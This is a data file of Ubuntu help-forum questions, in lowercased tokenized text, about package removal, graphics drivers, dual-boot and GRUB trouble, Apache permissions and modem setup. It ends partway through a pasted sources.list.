413792	removing sublimetext installation	i followed this link http : //www.technoreply.com/how-to-install-sublime-text-2-on-ubuntu-12-04-unity/ to install sublime-text 2 and i followed the steps hoping it would work and it does . except that now whenever i open sublime . it has a default.list , sublime.desktop file that always opens with it . then when i try to register with my license it works , but when i re-open the text editor its once again unregistered . i think installing it how i did must of broken sublime-text altogether and i have no idea how to reverse the effects . i was hoping someone here could help me out . also installed it through the sudo apt-get install sublime-text-installer but it turns out after doing what i did in the techno install tutorial it busted the whole thing . i should also mention that i tried to remove these files myself using sudo rm or sudo rm -rf but they seem to be already deleted . yet it still says they exist even though when i try to remove them now it says files could not be found .
413793	how to remove acroread	after trying to install acroread i did try to to remove it , with no success , the message follows . please help me because the software center was disabled as the result sudo apt-get remove acroread reading package lists ... done building dependency tree reading state information ... done virtual packages like 'acroread ' ca n't be removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : acroread-bin : i386 : depends : libfontconfig1 : i386 ( > = 2.9.0 ) but 2.8.0-3ubuntu9.1 is to be installed depends : libxml2 : i386 ( > = 2.6.27 ) but it is not going to be installed depends : libxt6 : i386 but it is not going to be installed google-chrome-stable : i386 : depends : xdg-utils : i386 ( > = 1.0.2 ) but it is not installable libxml2 : depends : liblzma5 ( > = 5.1.1alpha+20120614 ) but 5.1.1alpha+20110809-3 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
413794	shrinking logical partition	im trying to resize ( shrink ) my ubuntu partition . ive done the following things : -checked gparted which returns 2 partitions : one which says extended under filesystem , which encases the second volume which reads lvm2 pv ive tried this solution , to no avail im booting from a usb stick with 13.10 trying to fix this . what to do ? im trying to dual-boot with windows .
413798	what is amd64.tar.xz ?	i tried ubuntu 13.10 yesterday and had some really bad experiences , such as ubuntu not coming back from sleep mode . now i have downloaded the 12.04.1 version and started the installer . now the installer is downloading a file called amd64.tar.xz which is taking about six hours to complete . what is that ? my computer has the following specs : amd turion x2 ultra dual-core cpu zm-80 , ati mobility radeon hd 8650 4bg ram ddr3 . i downloaded the 32-bit version , since i want a smooth and fast os , not some junk . why is the installer downloading that file ? will it install the 64-bit version of ubuntu on my pc ? as a separate question , why is it taking so long for ubuntu to boot , and why , after selecting which os to boot , do i always have to choose between ubuntu and advanced options for ubuntu ?
413799	problem with opening tor in ubuntu 13.10	this message appears : jan 31 19:18:38.562 [ notice ] initialized libevent version 2.0.21-stable using method epoll ( with changelist ) . good . jan 31 19:18:38.562 [ notice ] opening socks listener on 127.0.0.1:9050 jan 31 19:18:38.562 [ warn ] could not bind to 127.0.0.1:9050 : address already in use . is tor already running ? jan 31 19:18:38.562 [ warn ] failed to parse/validate config : failed to bind one of the listener ports . help ! how do i open tor ?
413800	how to uninstall a wine software ?	i will start by saying this is not a duplicate of uninstall a program installed with wine nor how to uninstall a software that has been installed using wine ? . i already `` stfw '' as adviced in the how to ask guide . i 've installed plenty of software using wine . however i want to get ride of a lot of it ( not all ) . when i access the wine uninstaller i am able to uninstall the programs and then , they are back ( including that misterious and annoying program highligthed ) . i have tried deleting the programs from the `` c : / drive '' and also i have tried what is stated in the how to delete wine programs ? guide .
413803	bleachbit does not clean my chrome browser : why ?	i have bleachbit . it refuses to clean my chrome browser because it says it is running -- -- even after i have shut it down and even after i have gone off-line ! anybody have any idea what i should do ?
413806	how to take away nearly all permissions from a user in ubuntu 13.10 ?	i 'm trying to set up a kiosk for people to access firefox and print a page . i have a firewall set up to block all network access but the specific page and i have removed the application , files , music and other lenses from the dash . however , users can still access a terminal and make and delete files . how can i make it so this one user can not create or erase files and/or access a terminal ? i 've read some documentation on file permissions , but it 's not very clear to me . can someone explain it to me cleanly and concisely ?
413808	how to make php run on other folders ?	i have a php project in /var/www/myproject i am wondering if i want to have my projects in /home/myusername/projects/myproject and be able to run php on it , what should i do with apache ? what if i want other folders to be also taken into account by apache . so , for example : /home/workprojects/myotherproject and /home/myusername/projects/myproject thanks
413809	mouse and keyboard will not work windows 7 dual boot	my mouse and keyboard work fine in ubuntu , as well as grub . however , when i boot into windows 7 , i can not get past the login screen because the mouse and keyboard do not work . the lack of light on my mouse indicates that it 's not even on . this happened before when i tried to manually install ubuntu ( partitioning myself with gparted ) so i reinstalled and let ubuntu do everything for me ( `` install alongside windows 7 '' option ) and i thought that fixed the problem because the mouse and keyboard worked twice in a row . now , however , they have stopped working again . i am using a logitech k120 keyboard and a deathadder mouse . both are plugged into usb 2.0 ports .
413815	how can i be careful installing node.js via apt ?	i want to install etherpad on my ubuntu server . the etherpad installation instructions say : additionally , you 'll need node.js installed , ideally the latest stable version , be careful of installing nodejs from apt . what does that mean ? in my opinion , i can either choose to install it or not install it . do they mean that the version of nodejs distributed via apt may be an unstable or very old one ?
413818	new pc with windows 8 needed nomodeset to get ubuntu to load	apparently i need to accrue 10 reputation to post more than 2 links - so reposted everything i learned in trying to install ubuntu onto my windows 8 machine with a new graphics card on my blog : http : //patientprogrammer.blogspot.ca/2014/01/eight-hours-to-start-ubuntu.html the summary is - for the first eight hours or so i could n't get ubuntu boot-up/load from the usb drive . it would simply end up on a black screen and make the drum noise and the cursor keys would actually generate other noises - so it seems as if it is a graphics card issue . however , after adding the nomodeset flag/setting at the end of the linux line ubuntu finally loaded off the usb drive - but only version 13 ( 13.10 ) - i could n't get 12 ( 12.04.3 ) to work . my graphics card is : `` nvidia geforce gtx 780 - 3 gb - 941 ghz '' . now for my question - since i was able to work-around this issue using the nomodeset when booting off the usb drive - it does imply/confirm the problem is ubuntu 's `` understanding '' of my video-card . i 'm still unable to load ubuntu off my harddrive , even if i append the nomodeset flag/setting in the /etc/default/grub file onto this line : grub_cmdline_linux_default= '' quiet splash '' thus changing it to : grub_cmdline_linux_default= '' quiet splash nomodeset '' i 've tried running boot-repair three times now . when i boot using the ubuntu iso on my usb drive - there are three video drivers listed ( under `` additional drivers '' in `` software and updates '' ) : nvidia 319 ( proprietary ) nvidia 319 ( proprietary , tested ) x.org x server - nouveau display driver from xserver-xorg-video-nouveau and even if i change the above selection ( in the ui ) to one of the nvidia drivers - when i reboot it returns to the ubuntu 's nouveau video driver i 've read some articles about bumblebee or nvidia-prime . apparently they 're different routes you can go to try to address this - but it requires a series of commands of purge , followed by install , followed by update and i do n't want to mess things up worse than they already are - so i wanted to make sure i selected the right drivers/versions and most importantly used the correct commands for my version of the graphics card . one thing i 'm not clear on is when i boot from usb drive and load into the `` live session '' ( i believe that is what it is called ) - are the updates i make getting applied to my computer 's harddrive or just to the usb drive ? the reason i ask is because after issuing a bunch of commands/code like the ones below - a bunch of updates seem to happen and if i load the `` additional drivers '' panel in `` software and updates '' i see a new entry nvidia-331 ( open source ) has replaced the entry that was once nvidia-319 ( proprietary and tested ) . but then when i restart it is gone again . i 've tried the following commands : sudo apt-get remove -- purge nvidia-319-updates sudo apt-get remove -- purge nvidia-settings-319-updates it always just says `` not found '' . then the following : sudo apt-add-repository ppa : xorg-edgers/ppa sudo apt-get update # sudo apt-get install nvidia-331 # but instead of the above command - i used sudo apt-get install nvidia-current # i 've also tried this sudo apt-get install noveau-firmware xserver-xorg-video-nouveau xsever-xorg-video-nouveau-dbg but i just get '' unable to locate package nouveau-firmware '' i also tried the instructions mentioned in the comments ( the binarydriverhowto/nvidia ) : jockey-text -- help jockey-text -l jockey-text -e xorg : nvidia_current i saw my two disabled nvidia drivers 319 ( proprietary and `` proprietary and tested '' ) when i used the `` jockey-text -l '' command . however , when i tried to use the `` jockey-text -e xorg : nvidia_current '' - it just told me it was n't found . so off to google i went and found this page : http : //falkvinge.net/2013/02/15/how-to-install-nvidia-drivers-in-ubuntu-12-10-quantal/ and i did everything except apt-get install linux-headers-generic apt-get dist-upgrade because the idea of building the headers and having that `` up to date '' version of things scared me . but when i used this command apt-get install nvidia-current-updates it did end up getting the nvidia_304 driver . and then when i executed this command : nvidia-xconfig i got something interesting back : '' warning : unable to locate/open x configuration file . '' and '' new x configuration file written to '/etc/x11/xorg.conf ' '' i do n't know if that is a good thing or not - but it sounds like it has now created i file i had needed . and now when i use the `` jockey-text -l '' command i see a new driver ( nvidia_304 ) and it is `` enabled '' - but `` not in use '' ( possibly because i 'm in the `` drop to root terminal '' ) . on reboot - i get [ 1.457572 ] [ drm : drm_pci_agp_init ] *error* can not initialize the agpart module . [ 1.457642 ] drm : fill_in_dev failed . and even if i try going to `` recovery mode '' it stops/fails here : [ 1.420000 ] microcode : microcode update driver : v2.00 , peter oruba and nothing more is printed to screen - so looks like i 've bricked it . i ca n't even access the install of ubuntu on my harddrive . back to the drawing board . thankfully on my pc there is a ubuntu using linux 3.11.0-15-generic and linux 3.11.0-12-generic . without being able to get into the 3.11.0-12-generic i would n't have been able to go into the `` reovery mode '' menu and `` update grub bootloader '' and get the windows partition to appear in the grub menu ( every time i run boot-repair it removes that entry ) . i 've apparently installed tainted nvidia drivers ( according to some error messages when i try to boot into the 3.11.00-15 version ) - so that os can no longer boot - i ca n't even enter the recovery mode menu to `` drop to root '' ( the terminal window ) . how hard is it to just reinstall ubuntu over an existing install using the usb drive ? the boot-repair did n't fix anything . i 'm still just taking wild shots in the dark and i 'm now 48 hours without a working install of ubuntu on my harddrive . thanks !
413819	colorscheme vim depending on project	i have a project that uses ruby & javascript and i am really comfortable with a particular colorscheme . however i have another project in php + html , and i would like to use another colorscheme . what should i do ? i have my vim configuration in ~/.vimrc thanks
413822	how to purge bam huawei mobile partner ?	it annoying me every startup , now i use wvdial . i ca n't find it on synaptic package manager .
413824	gnu grub version 1.99-21ubuntu3.10	i am a new ubuntu user . while i was installing ubuntu 12.04 lts , the setup went wrong and now i 'm stuck on the gnu grub . i did n't did n't do dualboot . i ca n't even start with a live cd or usb . i also tried to type in ''exit '' and there was a boot menu but when i tried it , it said : boot failure : a proper digital signature was not found . one of the files on the selected boot device was rejected by the secure boot feature . can anyone give me a command line to get out of this ?
413825	i need to completely remove nvidia driver	can someone please help me completely remove the nvidia driver from my system ? i attempted to update and now x does not work . i do not know what specific directory the nvidia driver is in so please tell me that as well . thank you
413828	ubuntu 13.10 is freezing while using openjdk-7 and oracle java 1.7.0_51	i have had some problems with ubuntu 13.10 while using openjdk 7 to play minexraft 1.7.4 . ( please do n't tell me that i need to use oracle java , i already know i should be doing that . ) my computer is kind of old ( dell latitude d630 ) , and i have 2gb of ram . one of my biggest problems is that , while in the middle of playing minecraft , or using openjdk , for that matter , it will randomly freeze after about 5 minutes . then , i will have to hardboot the computer , and turn it back on . when it freezes , i ca n't do anything . nothing i do will register a response on the computer . in other words , is there an easy fix for this , is this a common bug , or or should i really really use oracle java and by doing that , i will fix the problem ? i just like openjdk better because it 's easier to install , and other stuff like that . edit : i just did use oracle java , and i had the same result . same error as this guy , except i used oracle java
413830	no wireless connection ubuntu 13.10	i just downloaded ubuntu 13.10 and literally could not know anything less . how do i connect to my wifi ? how do i set it up ? need help asap .
413835	what logfile contains time of startup and shutdown ?	i would like to analyze my pc usage and therefore have a list of when i shut down my laptop or alternatively when i logged out from my account in the last month . is there any logfile containing this information and if yes , where can i find it ? using ubuntu 13.10 .
413836	is upgrading a ppa through synaptic normal behaviour ?	i just downloaded a ppa for lyx with the commands from the wiki sudo add-apt-repository ppa : lyx-devel/ sudo apt-get update sudo apt-get install lyx2.0 i expected lyx to be upgraded with these commands , but it did n't . so i went to synaptic and upgraded the package . my question is if this how it is supposed to happen or there 's a problem with the ppa for not upgrading ? thank you for your inputs .
413837	need help booting windows after installing ubuntu dual boot	i recently installed ubuntu to dual boot with windows 7 . the first time i booted up , i was given the option to boot to ubuntu or windows . if i selected ubuntu , i would go to a grub menu for ubuntu . now , however , i immediately boot to grub . selecting windows 7 loads either /dev/sda1 or /dev/sda2 gives immediately a disk read error . i can access my windows files from my ubuntu installation , but can not access the windows os . i have run a smart check several times , all coming up clean . i have been told that the boot loader may have been overwritten , but can not confirm this . any and all help would be incredibly appreciated . as i am a relative novice to linux , i may not be able to provide in-depth details , nor understand the more technical answers .
413843	how to report an ubuntu bug without using apport	ubuntu 12.04 lts , 64 bit , kernel 3.2.0-58 i used to be able to report a bug to ubuntu by simply double clicking on the .crash files in directory /var/crash . last week i changed internet service providers . since then , when i double click a .crash file , the upload proceeds until the progress bar is almost to the right edge , the network traffic shows the size of the .crash file has been uploaded , and then a dialog appears with title `` network problem '' and message : '' can not connect to crash database , please check your internet connection . http error 502 : bad gateway '' i am using my new internet service provider for all other purposes without problem . from what i have read , this particular error indicates a problem that is not in my control . i would like to continue to report bugs to ubuntu . is there a way to do so with out using apport so as to circumvent the 502 network error ? for example , can i copy the .crash file to dropbox , and submit it to ubuntu ?
413844	how to bind lxc instance to a virtual interface in ubuntu 12.04 ?	i would like to bind my lxc instance to a virtual interface , eth0:1 . all the other tutorials/guides i 've seen involve setting the main interface to br0 , and restarting the networking service , which is something i do not want to do . how would i do this ? i only have one network adapter , and several static ips . i 'm running 1.0 from precise-backports .
413848	problem booting into windows 8.1 after using ubuntu live cd 12.04	i have a lenovo laptop tha came with windows 8 64bit pre-installed . i recently decided to pop in an ubuntu live cd 12.04 and i was messing around with it and i decided to try to erase the windows password using the command that i found in this website . the first time i tried this command , i was able to restart and boot into my windows 8 and the second time as well ( i kept doing this command because it did n't seem to work so i thought a 3rd will be a charm and well ... ) and the third time i did it i do n't know what i did wrong , it seemed like i did everything the same , but the next time i tried to boot up it just said `` checking media '' and it keeps restarting . so when i boot into the ubuntu live cd , i can see my windows 8 hard drive and the windows recovery partition when i click the home folder . i would just reinstall my windows 8 , but i need the product key which i never wrote down and it 's not under the laptop .
413851	can i create custom workspaces for when i login ?	i like to have a 6-screen setup with pdf viewer , sublime text , and chrome on the top row , three terminal windows on the second , and my database server and document viewer ( for notes ) on the last row . can i set it up so that when ubuntu starts these applications are always running and their windows always in the right place ? i have six workspaces thanks to ubuntu-tweak , so would an application/setting that did this need to be compatible with ubuntu-tweak ? am i right in thinking vanilla ubuntu can only have 4 workspaces ? would there be more options for setting up these pre-set workspaces if i limited myself to the 4 default workspaces ?
413856	connect wirelessly canon pixma mg3222 printer	i was reading over another question , but i ran into an issue of my own and it could n't be solved in the comments , so i have created a new one . the original post asked ... the canon pixma mg3222 printer i purchased works fine when wired but how do i get it to connect wirelessly to my laptop with ubuntu 12.04 ? someone replied with ... you can install the application for cannon pixama printers with ppa : michael-gruz/canon-trunk repository . sudo add-apt-repository ppa : michael-gruz/canon-trunk sudo apt-get update sudo apt-get install cndrvcups-common cnijfilter-common scangearmp-common then i replied with ... the following packages have unmet dependencies : cndrvcups-common : i386 : depends : cupsys : i386 but it is not installable or cups : i386 `but it is not going to be installed e : unable to correct problems , you have held broken` packages . i have run sudo apt-get install -f but that did n't fix it .
413857	problem installing and dual booting ubuntu 13.10 alongside windows 8 on dell inspiron 3537	i recently bought a windows 8 pre-installed dell laptop . i created a boot-able usb using lili bootable usb creator with 13.04 iso file for 64-bit ( amd64 ) downloaded from ubuntu official site and installed 13.04 alonside windows 8 . i disabled secure boot and legacy boot . only uefi was enabled . at the end of installation i restarted my computer and ubuntu got stuck in the purple page for hours . i had to later turn on the legacy boot also to successfully login to ubuntu 13.04 and use it . i updated 13.04 and upgraded it to 13.10 after a very long process and restarted my laptop as directed to start using 13.10 . but as i boot into ubuntu , i just get a black screen with a dialogue box saying `` the system is running on low graphics '' and that , i need to configure them manually . there is only one option that says `` ok '' . then i get a black screen with commands running on it . i checked for graphic drivers for my amd radeon 8600 2gb graphics . all the drivers were installed . i even followed all the steps as suggested in the in the post titled `` the greeter is invalid '' under how to fix `` the system is running in low-graphics mode '' error ? . i then followed procedures as suggested in http : //linuxg.net/fix-error-the-system-is-runnig-in-low-graphic-mode/ . after which i followed 1 , 2 , 3 and 4th step of post titled `` issues with nvidia or amd/ati graphics '' under how to fix `` the system is running in low-graphics mode '' error ? . and then i tried sudo apt-get install fglrx as given in 5th step of the same post in how to fix `` the system is running in low-graphics mode '' error ? . i rebooted and nothing happens . i even tried installing 13.10 using another bootable usb with the .iso file on it . but the same problem persists . please help me solve this problem .
413858	how to use burg with ubuntu studio 13.10 and windows 7	i set up my toshiba satellite to dual boot with windows 7 as the primary os and ubuntu studio 13.10 as secondary . i want a graphical bootloader or boot manager on start-up i like the way burg and refit look but refit is mac only and i 'm having a hard time even just installing burg . help and suggestions are needed . thank you
413862	compiz not accepting my changes	ok im using ubuntu 12.04 and im trying to change the keybind for the window context menu ( i think thats what its called . ) alt+right click opens a menu : minimize , unmaximize , move , etc . i need to get rid of that stupid menu so i can use blender properly ( alt+right click should be loop select , not a useless menu i would never bother with ) so i open compiz settings , change the keybind for the window menu from 'alt + button 3 ' to alt + button 4. nothing changes . the screen shows the newkeybind being set , but alt+right clicking still brings up the stupid menu . if i close compiz settings and re-open it its set back to alt+button 3. which might be one of the most irritating things ive ever seen . i have removed and reinstalled compiz settings , rebooted the computer , disableing the setting , changing the setting , i dont know what else to do , compiz doesnt seem care in the slightest . is there a way to clear all keybinds to nothing , and set all of them manually ? frankly id rather do that than reset all of ubuntus stupid keybinds that i never use but get in the way of doing other things
413863	zte ac2738 reliance modem not found after modprobe	i have searched the internet looking for a method to connect my zte ac2738 reliance dongle . i found few tips and tricks . one of them was from askubuntu zte ac2738 reliance netconnect is not able to connect i followed the link provided by techgs-modem . but after modprobe , wvdial could not detect the modem itself . i followed each step properly and also i changed the vendor and the product details . the commands related and its output are given below lsusb bus 002 device 007 : id 19d2 : fff5 zte wcdma technologies msm sudo wvdialconf /etc/wvdial.conf editing `/etc/wvdial.conf ' . scanning your serial ports for a modem . modem port scan < *1 > : s0 s1 s2 s3 s4 s5 s6 s7 modem port scan < *1 > : s8 s9 s10 s11 s12 s13 s14 s15 modem port scan < *1 > : s16 s17 s18 s19 s20 s21 s22 s23 modem port scan < *1 > : s24 s25 s26 s27 s28 s29 s30 s31 sorry , no modem was detected ! is it in use by another program ? did you configure it properly with setserial ? please read the faq at http : //alumnit.ca/wiki/ ? wvdial dmesg | tail ( after attaching the modem ) [ 1600.326884 ] usb 2-1.2 : serialnumber : 000000000002 [ 1600.327623 ] scsi8 : usb-storage 2-1.2:1.0 [ 1600.357693 ] init : usb-modeswitch-upstart main process ( 3853 ) terminated with status 127 [ 1601.325758 ] scsi 8:0:0:0 : cd-rom zte usb storage fff1 2.31 pq : 0 ansi : 2 [ 1601.327736 ] scsi 8:0:0:1 : direct-access zte usb storage fff1 2.31 pq : 0 ansi : 2 [ 1601.335019 ] sr1 : scsi-1 drive [ 1601.335203 ] sr 8:0:0:0 : attached scsi cd-rom sr1 [ 1601.336125 ] sr 8:0:0:0 : attached scsi generic sg3 type 5 [ 1601.336508 ] sd 8:0:0:1 : attached scsi generic sg4 type 0 [ 1601.373003 ] sd 8:0:0:1 : [ sdc ] attached scsi removable disk cat /etc/udev/rules.d/90-zte.rules subsystem== '' block '' , subsystem== '' scsi '' , attrs { model } == '' usb storage fff5 '' , action== '' add '' , run+= '' /sbin/modprobe usbserial vendor=0x19d2 product=0xfff5 '' please help me to fix this problem . ps : i am using ubuntu 12.04
413864	uninstalling ubuntu 12.04	i installed ubuntu alongside my windows 8 in a dual boot set-up but i did n't like it as much as i thought i would and now i would like to remove it . i have read over steps to do this ( restoring mbr and deleteing partitions ) but i do n't know if i should take any special steps because i did these to get ubuntu running : disabled fastboot ( via both bios and firmware ) disabled secure boot ran boot repair in ubuntu to get windows 8 bootable which added a windows 8 uefi option in grub . if someone could point me in the right direction that would be great .
413866	how to execute several commands after each other with one request to the terminal ( without using a file ) ?	i could ( 1 ) prepare a file with typed commands seperated by end-line , ( 2 ) make it executable , ( 3 ) run it from a file-system manager or the terminal . but this is ridiculous for not repeatable and every-time-other sets of commands . can i type those commands to the terminal in one request instead ? i do n't know end-line character for the terminal - ctrl , shift or alt with enter does n't work .
413870	gedit 3.6.3 in ubuntu 12.04 ?	hi i would like to know if i can upgrade gedit to version 3.6.3 in ubuntu 12.04 without the webupd8 ppa . i think the process would be similar like this : is there any way to install latest nautilus file manager in ubuntu 12.04 lts . please tell me if that works , thanks in advanced ! edit the info i posted above does not work . edit it looks like people want to know why , well the reason is because i want the latest features and speed improvements that came in gnome 3.6 and all of gnome 's applications . + i already have some gnome 3.6.3 software ( as you can tell from the link above i 've installed nautilus 3.6.3 aka files 3.6.3 ) . edit umm , so i am missing some of the dependencies that gedit needs , do i download it from packages.ubuntu.com and then install it the same way i attempted to install gedit 3.6.2 ?
413871	what is `` system program problem detected '' notification about and how to fix it ?	i will start by saying this is not a duplicate of system program problem detected nor `` system program problem detected '' . i do not want to disable apport . i want to find a way to know what is the problem the system detected and find a way of fix it . this notification appears everytime i log in : i am using ubuntu 13.10 saucy salamander 32bit . edits : 1 . apport wo n't come up when clicking report problem . 2 . cairo-dock wo n't start sporadically . 3 . login takes longer than expected . 4 . chrome crashes from time to time . 5 . laptop will overheat when cpu usage .
413874	update ubuntu 13.10 now my dual screens will not work .	i am using a lenovo b570 and just updated ubuntu 13.10 . now it will not recognize my monitor plugged into my hdmi port . when i go to settings > > display i get a message that could not get screen information . what do i do to fix this ?
413875	ubuntu 12.04.2 lts on thinkpad s431 issues when using battery power	i recently installed ubuntu 12.04.2 lts , using live cd , on my newly purchased thinkpad s431 laptop ( about one month ago , the newest model without touchscreen ) . everything is just nearly perfect and works out-of-the-box . except some issues when and only when the laptop is on battery power , listed below : note : all issues below exist only when the machine is on battery . all usb devices are not recognized . i ca n't use anything usb , including mouse and external hard drive . i know it must be some kind of auto-suspension of usb devices in order to save power . how do i disable the auto-suspension though ? the laptop will not shutdown . even when i chose `` shutdown '' , or type `` sudo shutdown -h now '' in the terminal , the laptop automatically boots up upon shutdown . i know it 's a common issue , and i have searched for solutions myself , yet none worked . so i can only close its lid , locking it , and hopefully save some power . then the worst thing happens ... it seems that the laptop in logged out/screen-locked state consumes almost equal power when it 's in active use ( programming , web surfing , etc. ) . that 's frustrating . summarizing , i suspect that all these issues must be caused by some mis-configs or bugs in my system 's power control systems ( acpi or something ) specific to laptops . yet being a gnu/linux newbie , i ca n't effectively find out solution myself . hope someone can help me here ... thank you for any help ! update 02/01/2014 : the following is the messages of dmesg when unplugging the power right after plugging in . [ 5595.670547 ] ehci_hcd 0000:00:1a.0 : found pci int a - > irq 11 [ 5595.670583 ] ehci_hcd 0000:00:1a.0 : sharing irq 11 with 0000:00:1c.0 [ 5595.670632 ] ehci_hcd 0000:00:1a.0 : sharing irq 11 with 0000:02:00.0 [ 5595.670676 ] ehci_hcd 0000:00:1a.0 : setting latency timer to 64 [ 5595.852071 ] nmi watchdog : enabled on all cpus , permanently consumes one hw-pmu counter . [ 5596.010496 ] ehci_hcd 0000:00:1d.0 : found pci int a - > irq 11 [ 5596.010610 ] ehci_hcd 0000:00:1d.0 : setting latency timer to 64 [ 5596.110461 ] xhci_hcd 0000:00:14.0 : setting latency timer to 64 [ 5612.201288 ] xhci_hcd 0000:00:14.0 : warn event trb for slot 1 ep 6 with no tds queued ? [ 5612.201301 ] xhci_hcd 0000:00:14.0 : warn event trb for slot 1 ep 0 with no tds queued ? after i plugged in a usb device ( my hard drive ) , however , there were no dmesg updates .
413878	remove ubuntu w/o grub	i installed ubuntu 12.04 through windows 7 via the windows installer and there 's no grub to speak of . when i turn on my computer i 'm presented with the windows boot loader where i can select either windows 7 or ubuntu 12.04 . i want to increase the size on my ubuntu partition , and it seems the easiest way to do so is a complete re-install . what 's the easiest way for me to uninstall ubuntu ?
413881	black screen after login ?	i had 12.04lts and recently decided to upgrade to 13.10 . 12.10 would n't ever start up and all i could access was the grub and the terminal , so i upgraded to 13.10 from there . i have a cd with 12.04 on it but i do not have the others on a disk and i can not make one because i do not have a cd large enough to make one . after 13.10 was installed , it worked alright . there were black bars around every field and i could not acess the terminal at all . i restarted it and after i put in my password , the screen goes blank and after a moment or so there would be two boxes that say something along the lines of a system problem being detected and i could move the cursor to click either cancel or report the problem . nothing would happen after that , but by using ctrl + alt + t i could access the terminal . i looked at a few other topics that others seemed to be having the same problem as i did but all of the solutions that were being suggested did n't work for some reason . i do n't want to reinstall the system because i could n't create a backup of my files before this happened .
413882	how can i get my macbook air superdrive to work ? on ubuntu 13.10	so ive used this sg_raw /dev/sr0 ea 00 00 00 00 00 01 it wakes my drive up but i ca n't play dvd with it on vlc or `` videos '' vlc gives no error ( here is my terminal log from vlc https : //ghostbin.com/paste/caxae )
413887	403 forbidden after changing documentroot directory apache 2.4.6	so i just installed a virtual machine with ubuntu 13.10 . i wanted to play with apache 2.4.6 before i update my ubuntu 12.04 servers . i want my document root to be in my home folder and so i changed it in the etc/apache2/sites-available/000-default.conf when i did that i just get the forbidden message . i set the new folder permissions to 777 but still get forbidden . i even put an index.html file in the new directory that just says hello world but nothing still . here is my 000-default.conf file . < virtualhost *:80 > # the servername directive sets the request scheme , hostname and port that # the server uses to identify itself . this is used when creating # redirection urls . in the context of virtual hosts , the servername # specifies what hostname must appear in the request 's host : header to # match this virtual host . for the default virtual host ( this file ) this # value is not decisive as it is used as a last resort host regardless . # however , you must set it for any further virtual host explicitly . # servername www.example.com serveradmin webmaster @ localhost documentroot /home/everett/webroot < directory /home/everett/webroot > options followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > # available loglevels : trace8 , ... , trace1 , debug , info , notice , warn , # error , crit , alert , emerg . # it is also possible to configure the loglevel for particular # modules , e.g . # loglevel info ssl : warn errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined # for most configuration files from conf-available/ , which are # enabled or disabled at a global level , it is possible to # include a line for only one particular virtual host . for example the # following line enables the cgi configuration for this host only # after it has been globally disabled with `` a2disconf '' . # include conf-available/serve-cgi-bin.conf < /virtualhost > # vim : syntax=apache ts=4 sw=4 sts=4 sr noet
413893	can someone walk me through step-by-step how to install ubuntu on the yoga 2 pro by lenovo ?	i am looking to install ubuntu on the lenovo yoga pro 2 , can someone who has done this explain how to get ubuntu running on it ?
413895	failed to upgrade 13.04 tp 13.10	when updating to 13.10 i am getting the following error and can not find a reference to it anywhere hit http : //archive.canonical.com quantal/partner i386 packages w : failed to fetch http : //mirror.overthewire.com.au/ubuntu/dists/raring/release unable to find expected entry 'main/binary-i386ls/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //mirror.overthewire.com.au/ubuntu/dists/raring-updates/release unable to find expected entry 'main/binary-i386ls/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //mirror.overthewire.com.au/ubuntu/dists/raring-backports/release unable to find expected entry 'main/binary-i386ls/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //mirror.overthewire.com.au/ubuntu/dists/raring-security/release unable to find expected entry 'main/binary-i386ls/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/raring/release unable to find expected entry 'main/binary-i386ls/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //archive.canonical.com/ubuntu/dists/raring/release unable to find expected entry 'partner/binary-i386ls/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //archive.canonical.com/ubuntu/dists/quantal/release unable to find expected entry 'partner/binary-i386ls/packages ' in release file ( wrong sources.list entry or malformed file ) e : some index files failed to download . they have been ignored , or old ones used instead . your suggestions would be appreciated . ron the following is the results of the suggestion 1 # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release i386 ( 20121017.2 ) ] / quantal main restricted 2 # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) ] / precise main restricted 3 4 # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to 5 # newer versions of the distribution . 6 deb http : //mirror.overthewire.com.au/ubuntu/ raring main restricted 7 deb-src http : //mirror.overthewire.com.au/ubuntu/ raring main restricted 8 9 # # major bug fix updates produced after the final release of the 10 # # distribution . 11 deb http : //mirror.overthewire.com.au/ubuntu/ raring-updates main restricted 12 deb-src http : //mirror.overthewire.com.au/ubuntu/ raring-updates main restricted 13 14 # # n.b . software from this repository is entirely unsupported by the ubuntu 15 # # team . also , please note that software in universe will not receive any 16 # # review or updates from the ubuntu security team . 17 deb http : //mirror.overthewire.com.au/ubuntu/ raring universe 18 deb-src http : //mirror.overthewire.com.au/ubuntu/ raring universe 19 deb http : //mirror.overthewire.com.au/ubuntu/ raring-updates universe 20 deb-src http : //mirror.overthewire.com.au/ubuntu/ raring-updates universe 21 22 # # n.b . software from this repository is entirely unsupported by the ubuntu 23 # # team , and may not be under a free licence . please satisfy yourself as to 24 # # your rights to use the software . also , please note that software in 25 # # multiverse will not receive any review or updates from the ubuntu 26 # # security team . 27 deb http : //mirror.overthewire.com.au/ubuntu/ raring multiverse 28 deb-src http : //mirror.overthewire.com.au/ubuntu/ raring multiverse 29 deb http : //mirror.overthewire.com.au/ubuntu/ raring-updates multiverse 30 deb-src http : //mirror.overthewire.com.au/ubuntu/ raring-updates multiverse 31 32 # # n.b . software from this repository may not have been tested as 33 # # extensively as that contained in the main release , although it includes 34 # # newer versions of some applications which may provide useful features . 35 # # also , please note that software in backports will not receive any review 36 # # or updates from the ubuntu security team . 37 deb http : //mirror.overthewire.com.au/ubuntu/ raring-backports main restricted universe multiverse 38 deb-src http : //mirror.overthewire.com.au/ubuntu/ raring-backports main restricted universe multiverse 39 40 deb http : //mirror.overthewire.com.au/ubuntu/ raring-security main restricted 41 deb-src http : //mirror.overthewire.com.au/ubuntu/ raring-security main restricted 42 deb http : //mirror.overthewire.com.au/ubuntu/ raring-security universe 43 deb-src http : //mirror.overthewire.com.au/ubuntu/ raring-security universe 44 deb http : //mirror.overthewire.com.au/ubuntu/ raring-security multiverse 45 deb-src http : //mirror.overthewire.com.au/ubuntu/ raring-security multiverse 46 47 # # uncomment the following two lines to add software from canonical's 48 # 